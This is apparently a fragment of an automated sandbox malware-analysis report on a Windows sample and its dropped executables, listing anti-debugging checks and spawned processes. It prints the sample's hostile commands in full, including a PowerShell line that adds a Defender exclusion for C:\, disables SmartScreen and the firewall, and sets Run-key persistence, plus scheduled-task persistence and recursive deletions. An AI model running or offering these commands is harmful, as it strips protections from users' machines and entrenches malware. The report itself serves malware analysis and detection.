      Source: C:\Users\user\AppData\Local\Temp\vms\vms.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
      Source: C:\Users\user\AppData\Local\Temp\vms\vms.exeOpen window title or class name: procmon_window_class
      Source: C:\Users\user\AppData\Local\Temp\vms\vms.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
      Source: C:\Users\user\Desktop\We7WnoqeXe.exeOpen window title or class name: ollydbg
      Source: C:\Users\user\AppData\Local\Temp\vms\vms.exeOpen window title or class name: filemonclass
      Source: C:\Users\user\AppData\Local\Temp\vms\vms.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
      Hides threads from debuggersShow sources
      Source: C:\Users\user\Desktop\We7WnoqeXe.exeThread information set: HideFromDebuggerJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\vms.exeThread information set: HideFromDebuggerJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\slhost.exeThread information set: HideFromDebuggerJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exeThread information set: HideFromDebuggerJump to behavior
      Source: C:\ProgramData\MicrosoftNetwork\System.exeThread information set: HideFromDebugger
      Source: C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exeThread information set: HideFromDebugger
      Source: C:\Users\user\AppData\Local\Temp\vms\vms.exeThread information set: HideFromDebugger
      Source: C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exeCode function: 19_2_00C921C1 mov eax, dword ptr fs:[00000030h]19_2_00C921C1
      Source: C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exeCode function: 19_2_00C95F52 mov eax, dword ptr fs:[00000030h]19_2_00C95F52
      Source: C:\Users\user\Desktop\We7WnoqeXe.exeProcess queried: DebugPortJump to behavior
      Source: C:\Users\user\Desktop\We7WnoqeXe.exeProcess queried: DebugObjectHandleJump to behavior
      Source: C:\Users\user\Desktop\We7WnoqeXe.exeProcess queried: DebugPortJump to behavior
      Source: C:\Users\user\Desktop\We7WnoqeXe.exeProcess queried: DebugObjectHandleJump to behavior
      Source: C:\Users\user\Desktop\We7WnoqeXe.exeProcess queried: DebugPortJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\vms.exeProcess queried: DebugPortJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\vms.exeProcess queried: DebugPortJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\vms.exeProcess queried: DebugObjectHandleJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\slhost.exeProcess queried: DebugPortJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\slhost.exeProcess queried: DebugPortJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\slhost.exeProcess queried: DebugObjectHandleJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exeProcess queried: DebugPortJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exeProcess queried: DebugPortJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exeProcess queried: DebugObjectHandleJump to behavior
      Source: C:\ProgramData\MicrosoftNetwork\System.exeProcess queried: DebugPort
      Source: C:\ProgramData\MicrosoftNetwork\System.exeProcess queried: DebugPort
      Source: C:\ProgramData\MicrosoftNetwork\System.exeProcess queried: DebugObjectHandle
      Source: C:\ProgramData\MicrosoftNetwork\System.exeProcess queried: DebugPort
      Source: C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exeProcess queried: DebugPort
      Source: C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exeProcess queried: DebugPort
      Source: C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exeProcess queried: DebugObjectHandle
      Source: C:\Users\user\AppData\Local\Temp\vms\vms.exeProcess queried: DebugPort
      Source: C:\Users\user\AppData\Local\Temp\vms\vms.exeProcess queried: DebugObjectHandle
      Source: C:\Users\user\AppData\Local\Temp\vms\vms.exeProcess queried: DebugPort
      Source: C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exeCode function: 19_2_00C81DA0 GetUserNameW,GetUserNameW,GetProcessHeap,GetProcessHeap,RtlAllocateHeap,GetUserNameW,GetProcessHeap,RtlAllocateHeap,GetProcessHeap,RtlAllocateHeap,GetProcessHeap,HeapFree,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,19_2_00C81DA0
      Source: C:\Users\user\Desktop\We7WnoqeXe.exeProcess token adjusted: DebugJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
      Source: C:\ProgramData\UpSys.exeProcess token adjusted: Debug
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
      Source: C:\ProgramData\UpSys.exeProcess token adjusted: Debug
      Source: C:\ProgramData\UpSys.exeProcess token adjusted: Debug
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
      Source: C:\ProgramData\UpSys.exeProcess token adjusted: Debug
      Source: C:\Users\user\Desktop\We7WnoqeXe.exeMemory allocated: page read and write | page guardJump to behavior

      HIPS / PFW / Operating System Protection Evasion:

      barindex
      Adds a directory exclusion to Windows DefenderShow sources
      Source: C:\Users\user\AppData\Local\Temp\slhost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" C:\ProgramData\UpSys.exe /SW:0 powershell.exe $(Add-MpPreference -ExclusionPath C:\); $(cd HKLM:\); $(New-ItemProperty Path $HKLM\SOFTWARE\Policies\Microsoft\Windows\System Name EnableSmartScreen -PropertyType DWord -Value 0); $(Set-ItemProperty -Path $HKLM\SYSTEM\CurrentControlSet\Services\mpssvc -Name Start -Value 4); $(netsh advfirewall set allprofiles state off); $(Get-Acl C:\ProgramData\Microsoft\Windows\SystemData | Set-Acl C:\ProgramData\MicrosoftNetwork); $(New-ItemProperty Path $HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Name WinNet -PropertyType String -Value C:\ProgramData\MicrosoftNetwork\System.exe); $(New-Item -Path C:\ProgramData -Name check.txt -ItemType file -Value 1); $(exit)
      Source: C:\ProgramData\MicrosoftNetwork\System.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" C:\ProgramData\UpSys.exe /SW:0 powershell.exe $(Add-MpPreference -ExclusionPath C:\); $(cd HKLM:\); $(New-ItemProperty Path $HKLM\SOFTWARE\Policies\Microsoft\Windows\System Name EnableSmartScreen -PropertyType DWord -Value 0); $(Set-ItemProperty -Path $HKLM\SYSTEM\CurrentControlSet\Services\mpssvc -Name Start -Value 4); $(netsh advfirewall set allprofiles state off); $(Get-Acl C:\ProgramData\Microsoft\Windows\SystemData | Set-Acl C:\ProgramData\MicrosoftNetwork); $(New-ItemProperty Path $HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Name WinNet -PropertyType String -Value C:\ProgramData\MicrosoftNetwork\System.exe); $(New-Item -Path C:\ProgramData -Name check.txt -ItemType file -Value 1); $(exit)
      Source: C:\Users\user\AppData\Local\Temp\slhost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" C:\ProgramData\UpSys.exe /SW:0 powershell.exe $(Add-MpPreference -ExclusionPath C:\); $(cd HKLM:\); $(New-ItemProperty Path $HKLM\SOFTWARE\Policies\Microsoft\Windows\System Name EnableSmartScreen -PropertyType DWord -Value 0); $(Set-ItemProperty -Path $HKLM\SYSTEM\CurrentControlSet\Services\mpssvc -Name Start -Value 4); $(netsh advfirewall set allprofiles state off); $(Get-Acl C:\ProgramData\Microsoft\Windows\SystemData | Set-Acl C:\ProgramData\MicrosoftNetwork); $(New-ItemProperty Path $HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Name WinNet -PropertyType String -Value C:\ProgramData\MicrosoftNetwork\System.exe); $(New-Item -Path C:\ProgramData -Name check.txt -ItemType file -Value 1); $(exit)Jump to behavior
      Source: C:\ProgramData\MicrosoftNetwork\System.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" C:\ProgramData\UpSys.exe /SW:0 powershell.exe $(Add-MpPreference -ExclusionPath C:\); $(cd HKLM:\); $(New-ItemProperty Path $HKLM\SOFTWARE\Policies\Microsoft\Windows\System Name EnableSmartScreen -PropertyType DWord -Value 0); $(Set-ItemProperty -Path $HKLM\SYSTEM\CurrentControlSet\Services\mpssvc -Name Start -Value 4); $(netsh advfirewall set allprofiles state off); $(Get-Acl C:\ProgramData\Microsoft\Windows\SystemData | Set-Acl C:\ProgramData\MicrosoftNetwork); $(New-ItemProperty Path $HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Name WinNet -PropertyType String -Value C:\ProgramData\MicrosoftNetwork\System.exe); $(New-Item -Path C:\ProgramData -Name check.txt -ItemType file -Value 1); $(exit)
      Source: C:\Users\user\AppData\Local\Temp\slhost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" C:\ProgramData\UpSys.exe /SW:0 powershell.exe $(Add-MpPreference -ExclusionPath C:\); $(cd HKLM:\); $(New-ItemProperty Path $HKLM\SOFTWARE\Policies\Microsoft\Windows\System Name EnableSmartScreen -PropertyType DWord -Value 0); $(Set-ItemProperty -Path $HKLM\SYSTEM\CurrentControlSet\Services\mpssvc -Name Start -Value 4); $(netsh advfirewall set allprofiles state off); $(Get-Acl C:\ProgramData\Microsoft\Windows\SystemData | Set-Acl C:\ProgramData\MicrosoftNetwork); $(New-ItemProperty Path $HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Name WinNet -PropertyType String -Value C:\ProgramData\MicrosoftNetwork\System.exe); $(New-Item -Path C:\ProgramData -Name check.txt -ItemType file -Value 1); $(exit)
      Source: C:\ProgramData\MicrosoftNetwork\System.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" C:\ProgramData\UpSys.exe /SW:0 powershell.exe $(Add-MpPreference -ExclusionPath C:\); $(cd HKLM:\); $(New-ItemProperty Path $HKLM\SOFTWARE\Policies\Microsoft\Windows\System Name EnableSmartScreen -PropertyType DWord -Value 0); $(Set-ItemProperty -Path $HKLM\SYSTEM\CurrentControlSet\Services\mpssvc -Name Start -Value 4); $(netsh advfirewall set allprofiles state off); $(Get-Acl C:\ProgramData\Microsoft\Windows\SystemData | Set-Acl C:\ProgramData\MicrosoftNetwork); $(New-ItemProperty Path $HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Name WinNet -PropertyType String -Value C:\ProgramData\MicrosoftNetwork\System.exe); $(New-Item -Path C:\ProgramData -Name check.txt -ItemType file -Value 1); $(exit)
      Source: C:\Users\user\AppData\Local\Temp\slhost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" C:\ProgramData\UpSys.exe /SW:0 powershell.exe $(Add-MpPreference -ExclusionPath C:\); $(cd HKLM:\); $(New-ItemProperty Path $HKLM\SOFTWARE\Policies\Microsoft\Windows\System Name EnableSmartScreen -PropertyType DWord -Value 0); $(Set-ItemProperty -Path $HKLM\SYSTEM\CurrentControlSet\Services\mpssvc -Name Start -Value 4); $(netsh advfirewall set allprofiles state off); $(Get-Acl C:\ProgramData\Microsoft\Windows\SystemData | Set-Acl C:\ProgramData\MicrosoftNetwork); $(New-ItemProperty Path $HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Name WinNet -PropertyType String -Value C:\ProgramData\MicrosoftNetwork\System.exe); $(New-Item -Path C:\ProgramData -Name check.txt -ItemType file -Value 1); $(exit)Jump to behavior
      Source: C:\ProgramData\MicrosoftNetwork\System.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" C:\ProgramData\UpSys.exe /SW:0 powershell.exe $(Add-MpPreference -ExclusionPath C:\); $(cd HKLM:\); $(New-ItemProperty Path $HKLM\SOFTWARE\Policies\Microsoft\Windows\System Name EnableSmartScreen -PropertyType DWord -Value 0); $(Set-ItemProperty -Path $HKLM\SYSTEM\CurrentControlSet\Services\mpssvc -Name Start -Value 4); $(netsh advfirewall set allprofiles state off); $(Get-Acl C:\ProgramData\Microsoft\Windows\SystemData | Set-Acl C:\ProgramData\MicrosoftNetwork); $(New-ItemProperty Path $HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Name WinNet -PropertyType String -Value C:\ProgramData\MicrosoftNetwork\System.exe); $(New-Item -Path C:\ProgramData -Name check.txt -ItemType file -Value 1); $(exit)
      Source: C:\Users\user\Desktop\We7WnoqeXe.exeProcess created: C:\Users\user\AppData\Local\Temp\vms.exe "C:\Users\user\AppData\Local\Temp\vms.exe" Jump to behavior
      Source: C:\Users\user\Desktop\We7WnoqeXe.exeProcess created: C:\Users\user\AppData\Local\Temp\slhost.exe "C:\Users\user\AppData\Local\Temp\slhost.exe" Jump to behavior
      Source: C:\Users\user\AppData\Local\Temp\vms.exeProcess created: C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe "C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe" Jump to behavior
      Source: C:\Users\user\AppData\Local\Temp\slhost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" C:\ProgramData\UpSys.exe /SW:0 powershell.exe $(Add-MpPreference -ExclusionPath C:\); $(cd HKLM:\); $(New-ItemProperty Path $HKLM\SOFTWARE\Policies\Microsoft\Windows\System Name EnableSmartScreen -PropertyType DWord -Value 0); $(Set-ItemProperty -Path $HKLM\SYSTEM\CurrentControlSet\Services\mpssvc -Name Start -Value 4); $(netsh advfirewall set allprofiles state off); $(Get-Acl C:\ProgramData\Microsoft\Windows\SystemData | Set-Acl C:\ProgramData\MicrosoftNetwork); $(New-ItemProperty Path $HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Name WinNet -PropertyType String -Value C:\ProgramData\MicrosoftNetwork\System.exe); $(New-Item -Path C:\ProgramData -Name check.txt -ItemType file -Value 1); $(exit)Jump to behavior
      Source: C:\Users\user\AppData\Local\Temp\slhost.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /K taskkill /IM Jump to behavior
      Source: C:\Users\user\AppData\Local\Temp\slhost.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /K taskkill /IM Jump to behavior
      Source: C:\Users\user\AppData\Local\Temp\slhost.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /K del /S /Q C:\ProgramData\Data\* && exitJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\slhost.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /K del /S /Q C:\ProgramData\Systemd\* && exitJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\slhost.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /K taskkill /IM Jump to behavior
      Source: C:\Users\user\AppData\Local\Temp\slhost.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /K del /S /Q C:\ProgramData\Systemd\* && exitJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\slhost.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /K taskkill /IM Jump to behavior
      Source: C:\Users\user\AppData\Local\Temp\slhost.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /K taskkill /IM Jump to behavior
      Source: C:\Users\user\AppData\Local\Temp\slhost.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /K del /S /Q C:\ProgramData\Data\* && exitJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\slhost.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /K del /S /Q C:\ProgramData\Systemd\* && exitJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\slhost.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /K taskkill /IM Jump to behavior
      Source: C:\Users\user\AppData\Local\Temp\slhost.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /K del /S /Q C:\ProgramData\Systemd\* && exitJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\slhost.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /K taskkill /IM Jump to behavior
      Source: C:\Users\user\AppData\Local\Temp\slhost.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /K taskkill /IM Jump to behavior
      Source: C:\Users\user\AppData\Local\Temp\slhost.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /K del /S /Q C:\ProgramData\Data\* && exitJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\slhost.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /K del /S /Q C:\ProgramData\Systemd\* && exitJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\slhost.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /K taskkill /IM Jump to behavior
      Source: C:\Users\user\AppData\Local\Temp\slhost.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /K del /S /Q C:\ProgramData\Systemd\* && exitJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\slhost.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /K taskkill /IM Jump to behavior
      Source: C:\Users\user\AppData\Local\Temp\slhost.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /K taskkill /IM Jump to behavior
      Source: C:\Users\user\AppData\Local\Temp\slhost.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /K del /S /Q C:\ProgramData\Data\* && exitJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\slhost.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /K del /S /Q C:\ProgramData\Systemd\* && exitJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\slhost.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /IM Jump to behavior
      Source: C:\Users\user\AppData\Local\Temp\slhost.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /K del /S /Q C:\ProgramData\Systemd\* && exitJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\slhost.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /K taskkill /IM Jump to behavior
      Source: C:\Users\user\AppData\Local\Temp\slhost.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /K taskkill /IM Jump to behavior
      Source: C:\Users\user\AppData\Local\Temp\slhost.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /IM Jump to behavior
      Source: C:\Users\user\AppData\Local\Temp\slhost.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /IM Jump to behavior
      Source: C:\Users\user\AppData\Local\Temp\slhost.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /K taskkill /IM Jump to behavior
      Source: C:\Users\user\AppData\Local\Temp\slhost.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /K del /S /Q C:\ProgramData\Systemd\* && exitJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\user\AppData\Local\Temp\5c436eadc6\Jump to behavior
      Source: C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN rnyuf.exe /TR "C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe" /FJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exeProcess created: C:\Users\user\AppData\Local\Temp\vms\vms.exe "C:\Users\user\AppData\Local\Temp\vms\vms.exe" Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\ProgramData\UpSys.exe "C:\ProgramData\UpSys.exe" /SW:0 powershell.exe
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\netsh.exe "C:\Windows\system32\netsh.exe" advfirewall set allprofiles state off
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /IM
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /IM
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\user\AppData\Local\Temp\5c436eadc6\
      Source: C:\ProgramData\MicrosoftNetwork\System.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" C:\ProgramData\UpSys.exe /SW:0 powershell.exe $(Add-MpPreference -ExclusionPath C:\); $(cd HKLM:\); $(New-ItemProperty Path $HKLM\SOFTWARE\Policies\Microsoft\Windows\System Name EnableSmartScreen -PropertyType DWord -Value 0); $(Set-ItemProperty -Path $HKLM\SYSTEM\CurrentControlSet\Services\mpssvc -Name Start -Value 4); $(netsh advfirewall set allprofiles state off); $(Get-Acl C:\ProgramData\Microsoft\Windows\SystemData | Set-Acl C:\ProgramData\MicrosoftNetwork); $(New-ItemProperty Path $HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Name WinNet -PropertyType String -Value C:\ProgramData\MicrosoftNetwork\System.exe); $(New-Item -Path C:\ProgramData -Name check.txt -ItemType file -Value 1); $(exit)
      Source: C:\ProgramData\MicrosoftNetwork\System.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /K taskkill /IM
      Source: C:\ProgramData\MicrosoftNetwork\System.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /K del /S /Q C:\ProgramData\Systemd\* && exit
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /IM
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /IM
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /IM
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\ProgramData\UpSys.exe "C:\ProgramData\UpSys.exe" /SW:0 powershell.exe
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\netsh.exe "C:\Windows\system32\netsh.exe" advfirewall set allprofiles state off
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /IM
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /IM
      Source: C:\ProgramData\UpSys.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /IM
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /IM
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /IM
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /IM
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /IM
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /IM
      Source: C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exeCode function: 19_2_00C82A20 ShellExecuteA,19_2_00C82A20
      Source: C:\Users\user\AppData\Local\Temp\slhost.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /IM Jump to behavior
      Source: C:\Users\user\AppData\Local\Temp\slhost.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /IM Jump to behavior
      Source: C:\Users\user\AppData\Local\Temp\slhost.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /IM Jump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /IM
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /IM
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /IM
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /IM
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /IM
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /IM
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /IM
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /IM
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /IM
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /IM
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /IM
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /IM
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /IM
      Source: slhost.exe, 0000000F.00000002.557411917.000002B9A5240000.00000002.00020000.sdmp, rnyuf.exe, 00000013.00000002.568136719.0000000001D00000.00000002.00020000.sdmp, System.exe, 00000021.00000000.536618860.0000027F95FE0000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
      Source: slhost.exe, 0000000F.00000002.557411917.000002B9A5240000.00000002.00020000.sdmp, rnyuf.exe, 00000013.00000002.568136719.0000000001D00000.00000002.00020000.sdmp, System.exe, 00000021.00000000.536618860.0000027F95FE0000.00000002.00020000.sdmpBinary or memory string: Progman
      Source: slhost.exe, 0000000F.00000002.557411917.000002B9A5240000.00000002.00020000.sdmp, rnyuf.exe, 00000013.00000002.568136719.0000000001D00000.00000002.00020000.sdmp, System.exe, 00000021.00000000.536618860.0000027F95FE0000.00000002.00020000.sdmpBinary or memory string: SProgram Managerl
      Source: slhost.exe, 0000000F.00000002.557411917.000002B9A5240000.00000002.00020000.sdmp, rnyuf.exe, 00000013.00000002.568136719.0000000001D00000.00000002.00020000.sdmp, System.exe, 00000021.00000000.536618860.0000027F95FE0000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd,
      Source: slhost.exe, 0000000F.00000002.557411917.000002B9A5240000.00000002.00020000.sdmp, rnyuf.exe, 00000013.00000002.568136719.0000000001D00000.00000002.00020000.sdmp, System.exe, 00000021.00000000.536618860.0000027F95FE0000.00000002.00020000.sdmpBinary or memory string: Progmanlock
      Source: UpSys.exe, 0000002B.00000000.445852041.0000000140097000.00000002.00020000.sdmp, UpSys.exe, 0000003D.00000002.497882162.0000000140097000.00000002.00020000.sdmp, UpSys.exe, 00000048.00000002.511731111.0000000140097000.00000002.00020000.sdmp, UpSys.exe, 00000050.00000000.484176444.0000000140097000.00000002.00020000.sdmp, UpSys.exe, 00000064.00000000.501538636.0000000140097000.00000002.00020000.sdmpBinary or memory string: ASCRWINUPRWINDOWNLWINUPLWINDOWNSHIFTUPSHIFTDOWNALTUPALTDOWNCTRLUPCTRLDOWNMOUSE_XBUTTON2MOUSE_XBUTTON1MOUSE_MBUTTONMOUSE_RBUTTONMOUSE_LBUTTONLAUNCH_APP2LAUNCH_APP1LAUNCH_MEDIALAUNCH_MAILMEDIA_PLAY_PAUSEMEDIA_STOPMEDIA_PREVMEDIA_NEXTVOLUME_UPVOLUME_DOWNVOLUME_MUTEBROWSER_HOMEBROWSER_FAVORTIESBROWSER_SEARCHBROWSER_STOPBROWSER_REFRESHBROWSER_FORWARDBROWSER_BACKNUMPADENTERSLEEPRSHIFTLSHIFTRALTLALTRCTRLLCTRLAPPSKEYNUMPADDIVNUMPADDOTNUMPADSUBNUMPADADDNUMPADMULTNUMPAD9NUMPAD8NUMPAD7NUMPAD6NUMPAD5NUMPAD4NUMPAD3NUMPAD2NUMPAD1NUMPAD0CAPSLOCKPAUSEBREAKNUMLOCKSCROLLLOCKRWINLWINPRINTSCREENUPTABSPACERIGHTPGUPPGDNLEFTINSERTINSHOMEF12F11F10F9F8F7F6F5F4F3F2F1ESCAPEESCENTERENDDOWNDELETEDELBSBACKSPACEALTONOFF0%d%dShell_TrayWndExitScript Pausedblankinfoquestionstopwarning
